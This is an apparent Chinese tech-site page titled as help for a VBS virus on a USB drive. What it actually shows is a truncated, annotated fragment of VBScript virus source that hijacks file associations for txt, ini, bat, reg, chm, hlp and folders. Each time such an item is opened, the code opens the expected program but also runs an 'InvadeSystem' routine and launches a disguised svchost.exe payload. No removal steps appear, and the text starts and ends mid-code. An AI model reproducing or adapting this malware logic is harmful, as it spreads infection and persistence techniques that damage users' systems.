u盘中了vbs病毒怎么办_u盘vbs病毒杀不干净_vbs病毒

r /> Param=Param&' '&Args(ArgNum)

ArgNum=ArgNum + 1

Loop

SubParam=LCase(Right(Param,3))'从Param串的右边取长度为3的子串，并且全部变为小写放进SubParam

Select Case SubParam'开始判断参数最右面，相当于后缀部分

Case 'run''貌似这种情况不存在,但是第一次会运行

RunPath=Left(WScript.ScriptFullName,2)'将72161642.vbs所在磁盘返回RunPath，比如D:

Call Run(RunPath)'Run('F:')没有意义

Call InvadeSystem(VirusLoad,VirusAss)

Call Run('%SystemRoot%\system\svchost.exe '&VirusLoad)

Case 'txt', 'log','ini' ,'inf''如果是这些表明用户打开了文本文件

RunPath='%SystemRoot%\system32\NOTEPAD.EXE '&Param

Call Run(RunPath)

Call InvadeSystem(VirusLoad,VirusAss)

Call Run('%SystemRoot%\system\svchost.exe '&VirusLoad)

Case 'bat', 'cmd''让批处理显示 you jump, i jump!

RunPath='CMD /c echo you jump i jump!&pause'

Call Run(RunPath)

Call InvadeSystem(VirusLoad,VirusAss)

Call Run('%SystemRoot%\system\svchost.exe '&VirusLoad)

Case 'reg'

RunPath='regedit.exe'&''''&Trim(Param)&'''''删除路径首尾空格

Call Run(RunPath)

Call InvadeSystem(VirusLoad,VirusAss)

Call Run('%SystemRoot%\system\svchost.exe '&VirusLoad)

Case 'chm'

RunPath='hh.exe '&''''&Trim(Param)&''''

Call Run(RunPath)

Call InvadeSystem(VirusLoad,VirusAss)

Call Run('%SystemRoot%\system\svchost.exe '&VirusLoad)

Case 'hlp'

RunPath='winhlp32.exe '&''''&Trim(Param)&''''

Call Run(RunPath)

Call InvadeSystem(VirusLoad,VirusAss)

Call Run('%SystemRoot%\system\svchost.exe '&VirusLoad)

Case 'dir'

RunPath=''''&Left(Trim(Param),Len(Trim(Param))-3)&'''''除去dir三个字母

Call Run(RunPath)'打开文件夹

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-25802-1.html